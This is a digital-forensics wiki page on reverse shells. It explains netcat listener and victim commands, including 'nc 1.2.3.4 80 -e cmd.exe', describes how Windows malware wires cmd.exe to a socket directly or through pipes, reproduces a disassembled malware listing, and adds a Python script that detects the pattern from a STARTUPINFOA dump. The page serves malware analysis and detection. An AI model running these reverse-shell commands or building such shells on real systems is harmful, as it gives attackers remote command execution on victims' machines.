Category:Digital-Forensics/Backdoors/Reverse-Shell
Reverse shell
A reverse shell is a shell started on the infected machine that connects back to the attacker and gives the attacker remote command execution. Because the victim initiates the connection (outbound), it also gets through firewalls that only filter inbound traffic. Netcat/Socat can be used for such purposes:
- Attacker: the below command opens a socket and waits for the victim to connect back (TCP port 80 is chosen to blend in with web traffic):
C:\> nc -l -p 80
- Infected machine: the victim connects to the attacker (1.2.3.4) and spawns a cmd.exe whose standard streams are tied to the socket (the -e option exists in the traditional Windows nc.exe build; Ncat uses --exec, and the OpenBSD netcat has no such option):
C:\> nc 1.2.3.4 80 -e cmd.exe
Windows Reverse Shell
Malware can implement a Windows reverse shell by starting cmd.exe with CreateProcess and pointing its standard streams at the network socket, either directly or through pipes. The presence of CreateThread and CreatePipe next to CreateProcess and the socket APIs could indicate the multithreaded variant of a Windows remote shell.
Basic
- Call to CreateProcess, with the STARTUPINFO structure passed to it filled in beforehand
- Socket created and connection to the remote server established (socket/WSASocket followed by connect)
- Socket handle copied into hStdInput, hStdOutput and hStdError of STARTUPINFO, with STARTF_USESTDHANDLES set in dwFlags, so that cmd.exe reads its commands from the network and writes its output back to it
- CreateProcess starts cmd.exe with the window hidden (STARTF_USESHOWWINDOW set in dwFlags and wShowWindow = SW_HIDE)
Multithreaded
- Creation of a socket, 2 pipes (CreatePipe) and 2 threads (CreateThread): one thread reads from the socket and writes into the pipe attached to the stdin of cmd.exe, the other reads from the pipe attached to the stdout/stderr of cmd.exe and writes to the socket
- CreatePipe returns a read handle and a write handle for each pipe
- CreateProcess ties the standard streams of cmd.exe to the pipe ends (stdin to the read end of the first pipe, stdout and stderr to the write end of the second) instead of directly to the socket; the handles must be inheritable (bInheritHandles = 1)
Note
The pipes give the malware a hook between cmd.exe and the network: the data is typically encrypted (or otherwise encoded) in the relaying threads before it is written to the socket, which is why this variant is used instead of the simpler one.
Example
The listing below (multithreaded variant) shows the pattern described above: two CreatePipe calls, StartupInfo.cb set to 44h (sizeof STARTUPINFOA on 32-bit), dwFlags set to 101h (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW), wShowWindow set to 0 (SW_HIDE; ebp holds 0 and is also used for the NULL arguments), hStdOutput and hStdError pointed at the write end of one pipe and hStdInput at the read end of the other, and CreateProcessA called with bInheritHandles = 1 on the command line "cmd.exe":
.text:00401262 mov esi, ds:CreatePipe
.text:00401268 lea ecx, [esp+1ACh+PipeAttributes]
.text:0040126C push ecx ; lpPipeAttributes
.text:0040126D push edx ; hWritePipe
.text:0040126E push ebx ; hReadPipe
.text:0040126F call esi ; CreatePipe
.text:00401271 lea ecx, [esp+1A8h+PipeAttributes]
.text:00401275 lea eax, [ebx+4]
.text:00401278 push ebp ; nSize
.text:00401279 push ecx ; lpPipeAttributes
.text:0040127A lea edx, [esp+1B0h+hReadPipe]
.text:0040127E push eax ; hWritePipe
.text:0040127F push edx ; hReadPipe
.text:00401280 call esi ; CreatePipe
.text:00401282 mov [esp+1A8h+StartupInfo.cb], 44h
.text:0040128A mov [esp+1A8h+StartupInfo.lpReserved], ebp
.text:0040128E mov eax, [esp+1A8h+hWritePipe]
.text:00401292 mov [esp+1A8h+StartupInfo.lpTitle], ebp
.text:00401296 mov [esp+1A8h+StartupInfo.lpDesktop], ebp
.text:0040129A mov [esp+1A8h+StartupInfo.dwYSize], ebp
.text:0040129E mov [esp+1A8h+StartupInfo.dwXSize], ebp
.text:004012A2 mov [esp+1A8h+StartupInfo.dwY], ebp
.text:004012A6 mov [esp+1A8h+StartupInfo.dwX], ebp
.text:004012AA mov [esp+1A8h+StartupInfo.wShowWindow], bp
.text:004012AF mov [esp+1A8h+StartupInfo.lpReserved2], ebp
.text:004012B3 mov [esp+1A8h+StartupInfo.cbReserved2], bp
.text:004012B8 mov [esp+1A8h+StartupInfo.dwFlags], 101h
.text:004012C0 mov [esp+1A8h+StartupInfo.hStdError], eax
.text:004012C7 mov [esp+1A8h+StartupInfo.hStdOutput], eax
.text:004012CE mov eax, [esp+1A8h+hReadPipe]
.text:004012D2 mov esi, ds:GetCurrentProcess
.text:004012D8 push ebp ; dwOptions
.text:004012D9 push 1 ; bInheritHandle
.text:004012DB lea ecx, [esp+1B0h+StartupInfo.hStdError]
.text:004012E2 push 2 ; dwDesiredAccess
.text:004012E4 push ecx ; lpTargetHandle
.text:004012E5 mov [esp+1B8h+StartupInfo.hStdInput], eax
.text:004012EC call esi ; GetCurrentProcess
.text:004012EE mov edx, [esp+1B8h+hWritePipe]
.text:004012F2 push eax ; hTargetProcessHandle
.text:004012F3 push edx ; hSourceHandle
.text:004012F4 call esi ; GetCurrentProcess
.text:004012F6 push eax ; hSourceProcessHandle
.text:004012F7 call ds:DuplicateHandle
.text:004012FD mov edi, offset aCmd_exe ; "cmd.exe"
.text:00401302 or ecx, 0FFFFFFFFh
.text:00401305 xor eax, eax
.text:00401307 lea edx, [esp+1A8h+CommandLine]
.text:0040130E repne scasb
.text:00401310 not ecx
.text:00401312 sub edi, ecx
.text:00401314 mov eax, ecx
.text:00401316 mov esi, edi
.text:00401318 mov edi, edx
.text:0040131A lea edx, [esp+1A8h+StartupInfo]
.text:0040131E shr ecx, 2
.text:00401321 rep movsd
.text:00401323 mov ecx, eax
.text:00401325 lea eax, [esp+1A8h+CommandLine]
.text:0040132C and ecx, 3
.text:0040132F rep movsb
.text:00401331 lea ecx, [esp+1A8h+ProcessInformation]
.text:00401338 push ecx ; lpProcessInformation
.text:00401339 push edx ; lpStartupInfo
.text:0040133A push ebp ; lpCurrentDirectory
.text:0040133B push ebp ; lpEnvironment
.text:0040133C push ebp ; dwCreationFlags
.text:0040133D push 1 ; bInheritHandles
.text:0040133F push ebp ; lpThreadAttributes
.text:00401340 push ebp ; lpProcessAttributes
.text:00401341 push eax ; lpCommandLine
.text:00401342 push ebp ; lpApplicationName
.text:00401343 call ds:CreateProcessA
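When analysing a sample like the one above, the quickest confirmation is to break on CreateProcessA, dump the 68 bytes at lpStartupInfo and decode them. The following script is an added example for this page (not code from the original page or from any malware sample): it unpacks a 32-bit STARTUPINFOA, names the dwFlags bits, and reports whether the hidden-window / redirected-std-handles setup is present and which variant the handle values suggest (one handle on all three streams for the socket-based variant, two different handles for the pipe-based one). The handle values and the API-import list in the fixtures are constructed for the demonstration.

```python
"""Decode a 32-bit STARTUPINFOA and flag the reverse-shell setup pattern."""
import struct

# STARTUPINFOA for a 32-bit process: 12 DWORDs, 2 WORDs, then 4 pointer/handle
# fields. sizeof() is 0x44 (68), the value the listing stores in StartupInfo.cb.
STARTUPINFOA_FMT = "<12I2H4I"
STARTUPINFOA_SIZE = struct.calcsize(STARTUPINFOA_FMT)  # 0x44
FIELDS = (
    "cb", "lpReserved", "lpDesktop", "lpTitle",
    "dwX", "dwY", "dwXSize", "dwYSize", "dwXCountChars", "dwYCountChars",
    "dwFillAttribute", "dwFlags", "wShowWindow", "cbReserved2", "lpReserved2",
    "hStdInput", "hStdOutput", "hStdError",
)
# dwFlags bits from winbase.h, ascending.
STARTF_FLAGS = {
    0x001: "STARTF_USESHOWWINDOW", 0x002: "STARTF_USESIZE",
    0x004: "STARTF_USEPOSITION", 0x008: "STARTF_USECOUNTCHARS",
    0x010: "STARTF_USEFILLATTRIBUTE", 0x020: "STARTF_RUNFULLSCREEN",
    0x040: "STARTF_FORCEONFEEDBACK", 0x080: "STARTF_FORCEOFFFEEDBACK",
    0x100: "STARTF_USESTDHANDLES", 0x200: "STARTF_USEHOTKEY",
}
STARTF_USESHOWWINDOW = 0x001
STARTF_USESTDHANDLES = 0x100
SW_HIDE = 0
STD_HANDLES = ("hStdInput", "hStdOutput", "hStdError")


def decode_startupinfo(buf):
    """Unpack raw STARTUPINFOA bytes into a dict and add symbolic flag names."""
    if len(buf) < STARTUPINFOA_SIZE:
        raise ValueError("need %d bytes, got %d" % (STARTUPINFOA_SIZE, len(buf)))
    si = dict(zip(FIELDS, struct.unpack_from(STARTUPINFOA_FMT, buf)))
    si["flag_names"] = [n for bit, n in STARTF_FLAGS.items() if si["dwFlags"] & bit]
    # cb != sizeof(STARTUPINFOA) means this is not a 32-bit STARTUPINFOA
    # (the 64-bit layout is 104 bytes, STARTUPINFOEXA is larger still).
    si["cb_matches_32bit"] = si["cb"] == STARTUPINFOA_SIZE
    return si


def classify_startupinfo(si, imports=()):
    """One-line verdict on a decoded structure.

    'imports' is an optional iterable of API names imported by the sample; it
    only refines the verdict for the pipe-based variant.
    """
    hidden = bool(si["dwFlags"] & STARTF_USESHOWWINDOW) and si["wShowWindow"] == SW_HIDE
    redirected = bool(si["dwFlags"] & STARTF_USESTDHANDLES) and all(si[h] for h in STD_HANDLES)
    if not (hidden and redirected):
        return "no reverse-shell indicators"
    h_in, h_out, h_err = (si[h] for h in STD_HANDLES)
    if h_in == h_out == h_err:
        # Basic variant: the connected socket is used for all three streams.
        return "basic variant: one handle (socket) on stdin/stdout/stderr, window hidden"
    if h_out == h_err and h_in != h_out:
        # Multithreaded variant: stdin is the read end of one pipe, stdout and
        # stderr share the write end of a second pipe; threads relay to the socket.
        verdict = "multithreaded variant: stdin on one pipe end, stdout/stderr on another, window hidden"
        if {"CreatePipe", "CreateThread"} <= set(imports):
            verdict += " (CreatePipe and CreateThread imported)"
        return verdict
    return "hidden window with three distinct redirected std handles (inspect manually)"


def build_startupinfo(flags, show_window, h_in, h_out, h_err):
    """Construct fixture bytes (not captured memory) with the given fields set."""
    return struct.pack(STARTUPINFOA_FMT, STARTUPINFOA_SIZE, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                       flags, show_window, 0, 0, h_in, h_out, h_err)


# Constructed fixtures; handle values are arbitrary but follow the two patterns.
# 0x101 == STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW, as in the listing above.
SAMPLE_PIPES = build_startupinfo(0x101, SW_HIDE, 0x80, 0x84, 0x84)   # read end of pipe 1, write end of pipe 2
SAMPLE_SOCKET = build_startupinfo(0x101, SW_HIDE, 0x5C, 0x5C, 0x5C)  # connected socket on all three
SAMPLE_BENIGN = build_startupinfo(0, 0, 0, 0, 0)                     # defaults: visible window, inherited console

if __name__ == "__main__":
    for name, buf in (("pipes", SAMPLE_PIPES), ("socket", SAMPLE_SOCKET), ("benign", SAMPLE_BENIGN)):
        si = decode_startupinfo(buf)
        print("%-7s cb=0x%02X dwFlags=0x%03X [%s] -> %s" % (
            name, si["cb"], si["dwFlags"], "|".join(si["flag_names"]) or "-",
            classify_startupinfo(si, imports=("CreatePipe", "CreateThread", "CreateProcessA"))))
```

In a live session the buffer comes from the debugger (the 68 bytes at the lpStartupInfo argument at the CreateProcessA call site); the fixtures above only stand in for that dump. A visible window or a missing STARTF_USESTDHANDLES is reported as "no reverse-shell indicators", so a sample that redirects std handles without hiding the window still needs a manual look at where the handles come from.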